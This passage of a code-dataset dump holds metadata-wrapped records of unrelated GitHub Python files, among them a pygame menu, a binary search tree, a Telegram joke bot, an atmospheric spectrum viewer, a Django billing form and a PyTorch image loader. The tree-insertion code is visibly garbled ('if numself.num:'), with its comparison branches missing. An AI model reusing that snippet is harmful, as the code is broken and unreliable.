2)\n else:\n screen.blit(self.quit_option, (300, 250))\n\n def handle_input(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_DOWN:\n self.selected_option = (self.selected_option + 1) % 2\n elif event.key == pygame.K_UP:\n self.selected_option = (self.selected_option - 1) % 2\n elif event.key == pygame.K_RETURN:\n if self.selected_option == 0:\n return \"start_game\"\n elif self.selected_option == 1:\n return \"quit\"\n","repo_name":"tjmlehtinen/kodarit-stars-2023","sub_path":"menus/start_menu.py","file_name":"start_menu.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"33294194554","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 13 11:11:32 2016\n\n@author: Miso\n\n\"\"\"\nbalance = 4773\nannualInterestRate = 0.2\nx=0\n\npayment = 0\nbalance_tmp = balance\nwhile balance_tmp > 0:\n payment += 10\n balance_tmp = balance\n for month in range(12):\n balance_tmp = (balance_tmp-payment)*(annualInterestRate/12 + 1) \n print(balance_tmp) \n #x+=1\nprint('Lowest Payment: ' + str(payment))\n\n#monthlyPaymentRate = 0.04 \n#debt(balance, annualInterestRate, monthlyPaymentRate)\n\n","repo_name":"1337tester/python-learning","sub_path":"Courses/6_00_1_MITx Introduction to Computer Science and Programming Using Python/PS2_P2.py","file_name":"PS2_P2.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13892383925","text":"class leaf:\r\n def __init__(self,num=None):\r\n self.num=num\r\n self.left=None\r\n self.right=None\r\n def plant(self,num):\r\n if self.num:\r\n if numself.num:\r\n if self.right is None:\r\n self.right=leaf(num)\r\n else:\r\n self.right.plant(num)\r\n else:\r\n self.num=num\r\n def show(self):\r\n print(self.num,end=\"\")\r\n if self.left:\r\n print(\" \",end=\"\")\r\n self.left.show()\r\n if self.right:\r\n print(\" \",end=\"\")\r\n self.right.show()\r\ntimed=0\r\nwhile 1>0:\r\n if timed>0:\r\n print(\"\")\r\n timed=timed+1\r\n total=int(input())\r\n data=[int(x) for x in input().split()]\r\n root=leaf()\r\n for i in range(len(data)):\r\n root.plant(data[i])\r\n root.show()\r\n","repo_name":"RexChenIsAHandsomeBoy/L10","sub_path":"10-1 BST.py","file_name":"10-1 BST.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70407242886","text":"\nimport numpy as np\nimport mxnet as mx\n\nfrom classifier import DECOClassifier\nimport gcn_mxnet as gcn\n\n\nclass DECOClassifierOVA:\n \"\"\"GNN-based classifier that uses embeddings for classifying the cells in\n spreadsheets of the DECO dataset. It is based on several binary classifiers\n combined by a one-vs-all strategy to solve this\n mulit-class classification problem.\n \"\"\"\n\n def __init__(self, dgl_graph, features, num_labels):\n self.gnn_classifiers = self._create_classifiers(\n dgl_graph, features, num_labels)\n return\n\n def train(self, train_ids, train_labels, valid_ids, valid_labels,\n max_epochs=300, max_stagnation=50):\n \"\"\"Trains the GNN networks previously created with the create_gcn_net()\n function.\n \"\"\"\n for i, classifier in enumerate(self.gnn_classifiers):\n bin_train_labels = self._get_binary_labels(train_labels, i)\n bin_valid_labels = self._get_binary_labels(valid_labels, i)\n classifier.train(\n train_ids, bin_train_labels, valid_ids, bin_valid_labels)\n return\n\n def evaluate(self, test_ids, labels):\n \"\"\"Applies the classifier on the test set and returns\n the predition and the accuracy value.\"\"\"\n results = []\n for i, classifier in enumerate(self.gnn_classifiers):\n pred = mx.nd.softmax(classifier.net(classifier.dgl_graph))\n results.append(pred[:, 1].expand_dims(1))\n results = mx.nd.concat(*results, dim=1)\n acc = gcn.evaluate(results[test_ids], labels)\n return mx.nd.softmax(results), acc\n\n def _create_classifiers(self, dgl_graph, features, num_labels):\n weight_vector = mx.nd.array(np.ones(2)) # no class weights\n classifiers = list()\n for i in range(num_labels):\n classifiers.append(DECOClassifier(dgl_graph, features, 2, weight_vector))\n return classifiers\n\n def _get_binary_labels(self, labels, selected_label):\n \"\"\"Creates a binary label vector from a mulit-class label vector.\n \"\"\"\n return (labels == selected_label)\n","repo_name":"guenthermi/table-embeddings","sub_path":"deco_classifier/one_vs_all_classifier.py","file_name":"one_vs_all_classifier.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"99"} +{"seq_id":"13160071797","text":"#!/bin/python3\r\n\r\nfrom random import randint\r\nplayer = input('rock (r), paper (p) or scissors (s)?')\r\nprint(player, 'vs' , end=' ')\r\n\r\nchosen = randint(1,3)\r\n#print(chosen)\r\n\r\nif chosen == 1:\r\n computer = 'r'\r\n\r\nelif chosen == 2:\r\n computer = 'p'\r\n \r\nelse:\r\n computer = 's'\r\n \r\nprint(computer)\r\n\r\n#When you play what the computer has played it's a draw\r\nif player == computer:\r\n print('DRAW!')\r\n \r\n#when the player plays rock and the computer plays scissors the player wins\r\nelif player == 'r' and computer == 's':\r\n print('Player wins!')\r\n \r\nelif player == 'r' and computer == 'p':\r\n print('Computer wins!')\r\n\r\nelif player == 'p' and computer == 'r':\r\n print('Player wins!')\r\n \r\nelif player == 'p' and computer == 's':\r\n print('Computer wins!')\r\n \r\nelif player == 's' and computer == 'r':\r\n print('Computer wins!')\r\n \r\nelif player == 's' and computer == 'p':\r\n print('Player wins!')\r\n \r\nelse:\r\n print('ohohohoh')\r\n","repo_name":"Nchuijangzelie/zenia","sub_path":"rock_paper_scissors/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73032749444","text":"import logging\nimport os\n\nfrom aiogram import Bot, types\nfrom aiogram.dispatcher import Dispatcher, filters\nfrom aiogram.utils import executor\nfrom telegram.parsemode import ParseMode\n\nfrom minigame import Game, PROMPT, GAME_STATUS, PLAYER_STATUS, ALREADY_PICKED_SLOT, GAME_ENDING, GAME_ENDED, \\\n RESULT_ANNOUNCEMENTS, END_PHRASE\nfrom mongodb import create_user, create_game, get_top_users, get_random_anecdote, connect, voice_to_text\nfrom randomizer import *\n\nclient = connect()\ndb = client.get_database(os.environ.get('MONGO_DB_NAME'))\n\nbot = Bot(token=os.environ.get(\"API_TOKEN\"))\ndp = Dispatcher(bot)\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nmini_game = Game()\n\n\n@dp.message_handler(commands=['vtt'], commands_ignore_caption=False, content_types=types.ContentType.VOICE)\nasync def vtt(message: types.Message):\n if message.content_type():\n await voice_to_text(message, bot)\n else:\n await message.answer('Мне нужно голосовое, чтобы привести его 🤬')\n\n\n@dp.message_handler(commands=['anecdote'])\nasync def anecdote(message: types.Message):\n random_anecdote = get_random_anecdote(db, message)\n await message.answer(random_anecdote or 'Ты мне не нравишься 🤬')\n\n\n@dp.message_handler(filters.Text(contains=['анек'], ignore_case=True))\nasync def trigger(message: types.Message):\n random_anecdote = get_random_anecdote(db, message)\n await message.answer(random_anecdote or 'Ты мне не нравишься 🤬')\n\n\n@dp.message_handler(commands=['c'], commands_ignore_caption=False, content_types=types.ContentType.ANY)\nasync def test(message: types.Message):\n await message.answer(f'TESTING')\n\n\n@dp.message_handler(commands=['start'])\nasync def start(message: types.Message):\n created = create_user(db, message)\n\n if created:\n await message.reply(f'Добро пожаловать в клуб, @{message.from_user.username}')\n else:\n await message.reply(f'С тобой мы уже знакомы, @{message.from_user.username} 😅')\n\n\n@dp.message_handler(commands=['help'])\nasync def help(message: types.Message):\n await message.reply('Ну, я могу анекдот рассказать..?')\n\n\n@dp.message_handler(commands=['top'])\nasync def top(message: types.Message):\n top_users = get_top_users(db, message)\n leaderboard = '\\n'.join(\n f'{emoji:^5}{idx + 1}\\\\. @{user[\"username\"]:<} \\\\- {user[\"points\"]:<20}' for idx, (user, emoji) in\n enumerate(zip(top_users, get_random_emojis())))\n heading = \"*Главные любители _сомнительного_ юмора:*\"\n await message.answer(f'{heading:^}\\n\\n{leaderboard}', parse_mode=ParseMode.MARKDOWN_V2)\n\n\n@dp.message_handler(commands=['leave'])\nasync def leave(message: types.Message):\n await message.reply('🫠')\n\n\n@dp.message_handler(commands=['game'])\nasync def game(message: types.Message):\n mini_game.start_game()\n await message.answer('🫠')\n await message.answer(PROMPT, reply_markup=mini_game.get_board())\n\n\n@dp.callback_query_handler(lambda c: c.data and c.data not in [*GAME_STATUS, *PLAYER_STATUS])\nasync def process_picked_slot(callback_query: types.CallbackQuery):\n revealed_slot = mini_game.reveal(callback_query.from_user.id, callback_query.from_user.username,\n int(callback_query.data))\n if revealed_slot == ALREADY_PICKED_SLOT:\n await bot.answer_callback_query(callback_query.id, \"Одна игра - одна попытка 😉\", show_alert=True)\n else:\n await callback_query.message.edit_text(\n text=f'\\n{callback_query.message.text}\\n@{callback_query.from_user.username} {RESULT_ANNOUNCEMENTS.get(revealed_slot)}',\n reply_markup=mini_game.get_board())\n\n\n@dp.callback_query_handler(lambda c: c.data and c.data in [*GAME_STATUS, *PLAYER_STATUS])\nasync def process_game_results(callback_query: types.CallbackQuery):\n if callback_query.data == GAME_ENDING:\n game_results = mini_game.get_results()\n created = create_game(db, game_results)\n game_results_markup = mini_game.end_game()\n await callback_query.message.edit_text(\n text=f'{callback_query.message.text}\\n\\n{END_PHRASE} @{callback_query.from_user.username}',\n reply_markup=game_results_markup)\n elif callback_query.data == GAME_ENDED:\n await bot.answer_callback_query(callback_query.id, \"Эта игра уже окончена!\", show_alert=True)\n\n\nasync def setup_bot_commands(disp):\n bot_commands = [\n types.BotCommand(\"anecdote\", \"Про Вовочку, Штирлица, Петьку и Чапаева 🥸\"),\n types.BotCommand(\"start\", \"Войти в игру 😎\"),\n types.BotCommand(\"game\", \"Рубануться 💀\"),\n types.BotCommand(\"help\", \"Запросить помощь 🙏🏻\"),\n types.BotCommand(\"top\", \"Узнать настоящих ценителей 💯\"),\n types.BotCommand(\"leave\", \"Уйти с позором 🏃‍♀️💨\"),\n\n ]\n await disp.bot.set_my_commands(bot_commands)\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True, on_startup=setup_bot_commands)\n","repo_name":"ovchinnikov7/telegram_bot","sub_path":"_site/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35705658478","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport pandas\nimport os\nimport gzip\nimport glob\nimport re\nfrom pyface.qt import QtGui, QtCore\nfrom traits.etsconfig.api import ETSConfig\nETSConfig.toolkit = 'qt4'\n\nimport matplotlib as mpl\nmpl.rcParams['backend.qt4']='PySide'\n\nmpl.use('Qt4Agg')\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\nfrom matplotlib.widgets import RectangleSelector, AxesWidget\nfrom matplotlib.ticker import FormatStrFormatter\n\nfrom traitsui.qt4.editor import Editor\nfrom traitsui.qt4.basic_editor_factory import BasicEditorFactory\nfrom traits.api import CFloat, HasTraits, Property, Instance, on_trait_change, List, Button, Float, Str\nfrom traitsui.api import View, Item, TextEditor, HGroup, VGroup, CustomEditor, Handler, CheckListEditor, Heading\n\nfrom pkg_resources import resource_filename\n\n#TODO: would like two-finger swipe side-to-side to move plot in wavenumber\n#TODO: (maybe) would like pinch to zoom/unzoom in wavenumber?\n#TODO: vertical resizing, extra space should go into plot, not UI area\n#TODO: central wavelength should have some up/down arrow buttons\n\nimport itertools\n\n\nclass _MPLFigureEditor(Editor):\n\n scrollable = True\n\n def init(self, parent):\n self.control = self._create_canvas(parent)\n self.set_tooltip()\n\n def update_editor(self):\n pass\n\n def _create_canvas(self, parent):\n \"\"\" Create the MPL canvas. \"\"\"\n frame = QtGui.QWidget()\n mpl_canvas = FigureCanvas(self.value)\n mpl_canvas.setParent(frame)\n\n vbox = QtGui.QVBoxLayout()\n vbox.addWidget(mpl_canvas)\n frame.setLayout(vbox)\n\n return frame\n\nclass MPLFigureEditor(BasicEditorFactory):\n\n klass = _MPLFigureEditor\n\nclass MPLInitHandler(Handler):\n \"\"\"Handler calls mpl_setup() to initialize mpl events\"\"\"\n\n def init(self, info):\n \"\"\"This method gets called after the controls have all been\n created but before they are displayed.\n \"\"\"\n info.object.mpl_setup()\n return True\n\nsize = (800, 600)\ntitle = \"xatmos viewer\"\n\ncolors = itertools.cycle(['b', 'g', 'r', 'c', 'm', 'orange'])\nhitran_path = os.path.split(resource_filename(__name__, 'atmos.txt.gz'))[0]\nhitran_files = glob.glob(hitran_path + '/hitran_abridged*txt*')\nmolecules = {}\nfor curfile in hitran_files:\n curname = re.match('^.*hitran_abridged_(.*)\\.txt.*$', curfile).groups()[0]\n molecules[curname] = {'hitran_filename':resource_filename(__name__, os.path.split(curfile)[-1]),\n 'hitran':None, 'plot_lines':None, 'plot_text':None, 'color':colors.next()}\n\nclass AtmosViewer(HasTraits):\n central_wavenumber = CFloat(1000)\n bandwidth = CFloat(10)\n\n selected_line_wavenumber = Float(-1.)\n\n figure = Instance(Figure, ())\n\n all_on = Button()\n all_off = Button()\n selected_molecules = List(editor=CheckListEditor(values=molecules.keys(),\n cols=2, format_str = '%s'))\n\n mplFigureEditor = MPLFigureEditor()\n\n trait_view = View(VGroup(Item('figure', editor=mplFigureEditor, show_label=False),\n HGroup('10',\n VGroup('40',\n Item(name='central_wavenumber',\n editor=TextEditor(auto_set=False, enter_set=True)),\n Item(name='bandwidth',\n editor=TextEditor(auto_set=False, enter_set=True)),\n HGroup(Item(name='selected_line_wavenumber'),\n show_border=True),\n show_border=True),\n HGroup(\n VGroup('20', Heading(\"Molecules\"),\n Item(name='all_on', show_label=False),\n Item(name='all_off', show_label=False)),\n Item(name='selected_molecules', style='custom', show_label=False),\n show_border=True), '10'),\n '10'),\n handler=MPLInitHandler,\n resizable=True, title=title, width=size[0], height=size[1])\n\n\n def __init__(self):\n super(AtmosViewer, self).__init__()\n self.colors = {'telluric':'black',\n 'orders':'black'}\n self.molecules = molecules\n self.selected_molecules = []\n orders_filename = resource_filename(__name__, 'orders.txt')\n self.texes_orders = pandas.io.parsers.read_csv(orders_filename, sep='\\t', header=None, skiprows=3)\n atmos_filename = resource_filename(__name__, 'atmos.txt.gz')\n self.atmos = pandas.io.parsers.read_csv(gzip.open(atmos_filename, 'r'), sep='\\t', skiprows=7, index_col='# wn')\n self.molecule_lookup_points = {} # keys are e.g. 'O3', with a dict of {'wn':..., 'y':...}\n self.axes = self.figure.add_subplot(111)\n self.axes.plot(self.atmos.index, self.atmos['trans1mm'], color=self.colors['telluric'])\n self.axes.plot(self.atmos.index, self.atmos['trans4mm'], color=self.colors['telluric'])\n for i in self.texes_orders.index:\n self.axes.plot(self.texes_orders.ix[i].values, [0.05, 0.07], color=self.colors['orders'])\n self.axes.set_xlim(self.central_wavenumber - self.bandwidth / 2.,\n self.central_wavenumber + self.bandwidth / 2.)\n self.axes.set_ylim(0, 1.0)\n self.axes.set_xlabel('Wavenumber (cm-1)')\n self.axes.xaxis.set_major_formatter(FormatStrFormatter('%6.1f'))\n self.onclick_connected = False # I don't understand why I can't do the connection here.\n self.selected_line = None\n self.selected_line_text = None\n\n def on_click(self, event):\n if event.xdata is None or event.ydata is None:\n return\n if self.selected_line in self.axes.lines:\n self.axes.lines.pop(self.axes.lines.index(self.selected_line))\n if self.selected_line_text in self.axes.texts:\n self.axes.texts.remove(self.selected_line_text)\n self.selected_line = None\n self.selected_line_text = None\n self.selected_line_wavenumber = -1\n if len(self.molecule_lookup_points) == 0:\n return\n closest = {'name':None, 'wn':-1., 'dist':9e9}\n for cur_molecule in self.molecule_lookup_points:\n wn = self.molecule_lookup_points[cur_molecule]['wn']\n ys = self.molecule_lookup_points[cur_molecule]['y']\n dist_x2 = (wn - event.xdata)**2\n xlim = self.axes.get_xlim()\n scale = ((xlim[1] - xlim[0]) / # this is like wavenumbers/inch\n (self.axes.figure.get_figwidth() * self.axes.get_position().bounds[2]))\n dist_y2 = ((ys - event.ydata)*(self.axes.figure.get_figheight() *\n self.axes.get_position().bounds[3]) * scale)**2\n dist = np.sqrt(dist_x2 + dist_y2)\n if dist.min() < closest['dist']:\n closest = {'name':cur_molecule, 'wn':wn[dist.argmin()], 'dist':dist.min()}\n self.selected_line_wavenumber = closest['wn']\n self.selected_line = self.axes.plot([closest['wn'], closest['wn']], [0, 1], '-.', color='black')[0]\n self.selected_line_text = self.axes.annotate(closest['name'] + ('%11.5f' % closest['wn']),\n (closest['wn'], 1.03), ha='center',\n annotation_clip=False)\n self.redraw()\n\n def on_scroll(self, event):\n self.central_wavenumber += self.bandwidth * event.step\n\n def _all_on_fired(self):\n self.selected_molecules = self.molecules.keys()\n\n def _all_off_fired(self):\n self.selected_molecules = []\n\n def mpl_setup(self):\n self.axes_widget = AxesWidget(self.figure.gca())\n self.axes_widget.connect_event('button_press_event', self.on_click)\n self.axes_widget.connect_event('scroll_event', self.on_scroll)\n\n @on_trait_change(\"central_wavenumber, bandwidth\")\n def replot_molecular_overplots(self):\n for i, cur_molecule in enumerate(self.selected_molecules):\n if self.molecules[cur_molecule]['hitran'] is None:\n self.molecules[cur_molecule]['hitran'] = pandas.io.parsers.read_csv( gzip.open(\n self.molecules[cur_molecule]['hitran_filename'], 'r'), skiprows=2)\n wn = self.molecules[cur_molecule]['hitran']['wavenumber']\n intensity = self.molecules[cur_molecule]['hitran']['intensity']\n w = ( (wn >= self.central_wavenumber - self.bandwidth / 2.) &\n (wn <= self.central_wavenumber + self.bandwidth / 2.) )\n wn = wn[w]\n intensity = intensity[w]\n plot_orders_of_magnitude = 2.\n max_line_intensity = intensity.max()\n min_line_intensity = max_line_intensity / 10**plot_orders_of_magnitude\n wn = wn[intensity >= min_line_intensity]\n intensity = intensity[intensity >= min_line_intensity]\n intensity = ((np.log10(intensity) - np.log10(min_line_intensity)) /\n (np.log10(max_line_intensity) - np.log10(min_line_intensity)))\n intensity = intensity * 0.1\n self.molecule_lookup_points[cur_molecule] = {'wn':wn, 'y':intensity + (i * 0.1) + 0.05}\n wn = wn.repeat(3)\n intensity = np.column_stack((np.zeros(len(intensity)),\n intensity,\n np.zeros(len(intensity)))).flatten() + (i * 0.1) + 0.05\n newplot = self.axes.plot(wn, intensity, self.molecules[cur_molecule]['color'])\n newtext = self.axes.annotate(cur_molecule, (self.central_wavenumber + self.bandwidth * 0.51,\n i * 0.1 + 0.065), ha='left',\n va='center', annotation_clip=False, color=self.molecules[cur_molecule]['color'])\n if self.molecules[cur_molecule]['plot_lines'] in self.axes.lines:\n self.axes.lines.pop(self.axes.lines.index(self.molecules[cur_molecule]['plot_lines']))\n self.molecules[cur_molecule]['plot_lines'] = None\n if self.molecules[cur_molecule]['plot_text'] in self.axes.texts:\n self.axes.texts.remove(self.molecules[cur_molecule]['plot_text'])\n self.molecules[cur_molecule]['plot_text'] = None\n self.molecules[cur_molecule]['plot_lines'] = newplot[0]\n self.molecules[cur_molecule]['plot_text'] = newtext\n self.redraw()\n\n def _selected_molecules_changed(self, old, new):\n self.replot_molecular_overplots()\n for cur_molecule in old:\n if cur_molecule not in new:\n if self.molecules[cur_molecule]['plot_lines'] in self.axes.lines:\n self.axes.lines.pop(self.axes.lines.index(self.molecules[cur_molecule]['plot_lines']))\n if self.molecules[cur_molecule]['plot_text'] in self.axes.texts:\n self.axes.texts.remove(self.molecules[cur_molecule]['plot_text'])\n self.molecules[cur_molecule]['plot_lines'] = None\n self.molecules[cur_molecule]['plot_text'] = None\n self.molecule_lookup_points.pop(cur_molecule, None)\n self.redraw()\n\n @on_trait_change(\"central_wavenumber, bandwidth\")\n def redraw(self):\n self.axes.set_xlim(self.central_wavenumber - self.bandwidth / 2.,\n self.central_wavenumber + self.bandwidth / 2.)\n self.axes.set_ylim(0, 1.0)\n self.figure.canvas.draw()\n\n\n\nAtmosViewer().configure_traits()\n\n","repo_name":"henryroe/xatmos","sub_path":"xatmos/xatmos.py","file_name":"xatmos.py","file_ext":"py","file_size_in_byte":12041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"40886668447","text":"\nfrom datetime import datetime\nimport time\n\n\n# =============================================================================\n# Load general modules\n# =============================================================================\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\ncolnames = ['channel','subchannel','date_time','timestamp','value','unit','timestring']\n\n\n\nfor i in np.arange(47,142):\n \n if i<100:\n filename = 'log0'+str(i) \n else:\n filename = 'log'+str(i) \n# print(filename)\n data = pd.read_csv(filename,header=None,sep=';')\n Nrows = data.shape[0]\n\n# df = pd.DataFrame(columns=colnames)\n channels = []\n subchannels = []\n date_times = []\n timestamps = []\n values = []\n units = []\n timestrings = []\n print(filename+': Reading file') \n for index, rows in data.iterrows():\n# print(filename+': Reading line ' +str(index)+' of '+str(Nrows))\n string = rows[0]\n tmp = string.split('/')\n notused = tmp[0]\n channel = tmp[1]\n string = tmp[2]\n tmp = string.split('\"')\n subchannel = tmp[0]\n string = tmp[4]\n tmp = string.split(',')\n \n if tmp[0]=='None':\n value = np.nan\n unit = np.nan\n date_time=np.nan\n timestamp=np.nan\n elif channel == 'SeapathGPSGga':\n degs = float(tmp[0][0:2])\n mins = float(tmp[0][2:])\n value = degs+mins/60\n else:\n value = float(tmp[0])\n timestring= tmp[1]\n date_time = datetime.strptime(timestring[0:-1],\"%Y-%m-%dT%H:%M:%S.%f\")\n timestamp = date_time.timestamp() \n unit = tmp[2]\n# df.loc[len(df)] = [channel,subchannel,date_time,timestamp,value,unit,timestring]\n\n channels.append(channel)\n subchannels.append(subchannel)\n date_times.append(date_time)\n timestamps.append(timestamp)\n values.append(value)\n units.append(unit)\n timestrings.append(timestring) \n print(filename+': creating dataframe') \n df = pd.DataFrame.from_dict({'channel': channels,'subchannel':subchannels,'date_time':date_times,\n 'timestamp':timestamps,'value': values, 'unit': units,'timestring': timestrings})\n\n# df = df.append({'channel': channel,'subchannel':subchannel,'date_time':date_time,\n# 'timestamp':timestamp,'value': value, 'unit': unit,'timestring': timestring},ignore_index=True)\n print(filename+': Saving file') \n df.to_csv('df_'+filename+'.csv',index=False)\n \n# lat = df.loc[df.subchannel=='Latitude']\n# long = df.loc[df.subchannel=='Longitude']\n# plt.plot(lat.value,long.value)\n \n#roll = df.loc[df.subchannel=='Roll']\n\n#plt.plot(roll.timestamp-roll.timestamp.iloc[0],roll.value)\n\n\n#lat = df.loc[df.subchannel=='Latitude']\n#long = df.loc[df.subchannel=='Longitude']\n\n\n\n\n","repo_name":"NTNU-MCS/MCSim_python","sub_path":"dev/mathima/RVG_mantests/27102022/27102022/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"35989916156","text":"from django import forms\nfrom django.core.validators import RegexValidator\nCREDIT_CARD_RE = r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\\\d{3})\\d{11})$'\n\n\nclass BillingForm(forms.Form):\n card_no = forms.CharField(required=True, max_length=16, validators=[\n RegexValidator(\n regex='^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9]{13}|3(?:0[0-5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\\\\d{3})\\d{11})$',\n message='Card No must be numeric and contain 16 digit',\n ),\n ])\n cvc = forms.CharField(required=True, max_length=3, validators=[\n RegexValidator(\n regex='^\\d{1,10}$',\n message='Cvc must be numeric and contain 3 digit',\n ),\n ])\n exp_year = forms.CharField(required=True, max_length=4, validators=[\n RegexValidator(\n regex='^\\d{1,10}$',\n message='Year must be numeric and contain 4 digit',\n ),\n ])\n exp_month = forms.CharField(required=True, max_length=2, validators=[\n RegexValidator(\n regex='^\\d{1,10}$',\n message='Month must be numeric and contain 2 digit',\n ),\n ])\n coupon_code = forms.CharField(required=False, max_length=225)\n","repo_name":"inotite/Django-ERCTRL","sub_path":"apps/erm_billing/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"41586627898","text":"import numpy\nimport torch.utils.data as data\nimport torch\n\nimport os, random, cv2\nimport numpy as np\nimport Augmentor\n\nIMG_EXTENSIONS = ['.png']\n\n\ndef make_color_seg(res_image, nrow=256, ncol=256):\n color = np.zeros((nrow, ncol, 3))\n for j in range(nrow):\n for k in range(ncol):\n if (res_image[j][k] == 0):\n color[j][k] = [0, 0, 0]\n if (res_image[j][k] == 1):\n color[j][k] = [128, 0, 0]\n if (res_image[j][k] == 2):\n color[j][k] = [0, 128, 0]\n if (res_image[j][k] == 3):\n color[j][k] = [128, 128, 0]\n if (res_image[j][k] == 4):\n color[j][k] = [0, 128, 128]\n if (res_image[j][k] == 5):\n color[j][k] = [64, 0, 0]\n if (res_image[j][k] == 6):\n color[j][k] = [192, 0, 0]\n if (res_image[j][k] == 7):\n color[j][k] = [128, 64, 64]\n if (res_image[j][k] == 9):\n color[j][k] = [0, 64, 128]\n return color\n\n\ndef has_file_allowed_extension(filename, extensions):\n \"\"\"Checks if a file is an allowed extension.\n\n Args:\n filename (string): path to a file\n\n Returns:\n bool: True if the filename ends with a known image extension\n \"\"\"\n filename_lower = filename.lower()\n return any(filename_lower.endswith(ext) for ext in extensions)\n\n\ndef find_classes(dir):\n classes = [d for d in os.listdir(dir) if os.path.isdir(os.path.join(dir, d))]\n classes.sort()\n class_to_idx = {classes[i]: i for i in range(len(classes))}\n return classes, class_to_idx\n\n\ndef make_dataset(dir, extensions):\n images = []\n for root, _, fnames in sorted(os.walk(dir)):\n fnames = [fname for fname in fnames if has_file_allowed_extension(fname, extensions)]\n\n seg_names = [x for x in fnames if 'seg' in x]\n # pair off with seg if exists\n if seg_names:\n for fname in sorted(seg_names):\n img_name = fname.replace(\"_seg\", \"\")\n path = os.path.join(root, img_name)\n if not os.path.isfile(path):\n img_name = fname.replace(\"_seg\", \"_img\")\n path = os.path.join(root, img_name)\n seg_path = os.path.join(root, fname)\n item = (path, seg_path)\n images.append(item)\n else:\n img_names = [x for x in fnames if 'seg' not in x]\n for img_name in sorted(img_names):\n path = os.path.join(root, img_name)\n item = (path, None)\n images.append(item)\n\n out_file = os.path.join(dir, 'fnames.csv')\n np.savetxt(out_file, images, fmt=\"%s\", delimiter=',')\n return images\n\n\nclass DatasetFolder(data.Dataset):\n def __init__(self, root, loader, extensions, transform=None, img_size=256, num_ch=3, num_classes=8, seg_factor=1,\n aug_options=None, col_size=None):\n # classes, class_to_idx = find_classes(root)\n samples = make_dataset(root, extensions)\n self.fnames = samples\n if len(samples) == 0:\n raise(RuntimeError(\"Found 0 files in subfolders of: \" + root + \"\\n\"\n \"Supported extensions are: \" + \",\".join(extensions)))\n\n self.root = root\n # self.loader = loader\n self.seg_factor = seg_factor\n self.aug_options = aug_options\n self.num_ch = num_ch\n self.num_classes = num_classes\n\n self.img_size = img_size\n if col_size is None:\n self.col_size = self.img_size\n else:\n self.col_size = col_size\n\n self.extensions = extensions\n self.samples = samples\n\n self.transform = transform\n\n def __getitem__(self, index, visualise=False):\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (sample, target) where target is class_index of the target class.\n \"\"\"\n path, target_path = self.samples[index]\n sample = default_loader(path, num_ch=self.num_ch)\n if target_path is not None:\n target = default_loader(target_path, seg_factor=self.seg_factor, num_ch=1)\n else:\n target = numpy.array([0.0])\n # target = []\n\n # ## https://github.com/mdbloice/Augmentor/blob/master/notebooks/Multiple-Mask-Augmentation.ipynb\n # collated_images_and_masks = [(path, target_path)]\n # from PIL import Image\n # images = [[np.asarray(Image.open(y)) for y in x] for x in collated_images_and_masks]\n # p = Augmentor.DataPipeline(images, [1])\n\n ## use Augmentor for image and mask transforms\n sample_aug = sample\n target_aug = target\n if self.aug_options is not None:\n # p = Augmentor.DataPipeline([sample], [1])\n p = Augmentor.DataPipeline([[sample, target]], [1])\n\n # order matters\n if sample.shape[:2]!=(self.img_size, self.col_size):\n p.resize(probability=1, height=self.img_size, width=self.col_size)\n\n for key, key_dict in self.aug_options.items():\n if key=='normalize':\n 1 # handled by torch transforms\n elif key==\"crop_random\":\n getattr(p, key)(**key_dict)\n sample_shape = sample.shape\n height, width = sample_shape[:2]\n p.resize(probability=1, width=max(width, self.col_size), height=max(height, self.img_size))\n elif key==\"shadow\":\n 1 # handled by shadow below\n else:\n getattr(p, key)(**key_dict)\n p.crop_by_size(probability=1, width=self.col_size, height=self.img_size)\n\n print(len(p.augmentor_images), len(p.augmentor_images[0]), p.augmentor_images[0][0].shape, p.augmentor_images[0][0].dtype)\n augmented_images, labels = p.sample(1)\n # print(\"=============================================\")\n # print(augmented_images)\n sample_aug = augmented_images[0][0]\n target_aug = augmented_images[0][1]\n\n if 'shadow' in self.aug_options and random.random() > self.aug_options[\"shadow\"][\"probability\"]: # only shadow img - NOT mask\n sample_aug = shadows(sample_aug)\n\n if visualise:\n import matplotlib.pyplot as plt\n import numpy as np\n plt.figure(1)\n plt.clf()\n plt.imshow(sample)\n\n plt.figure(2)\n plt.clf()\n 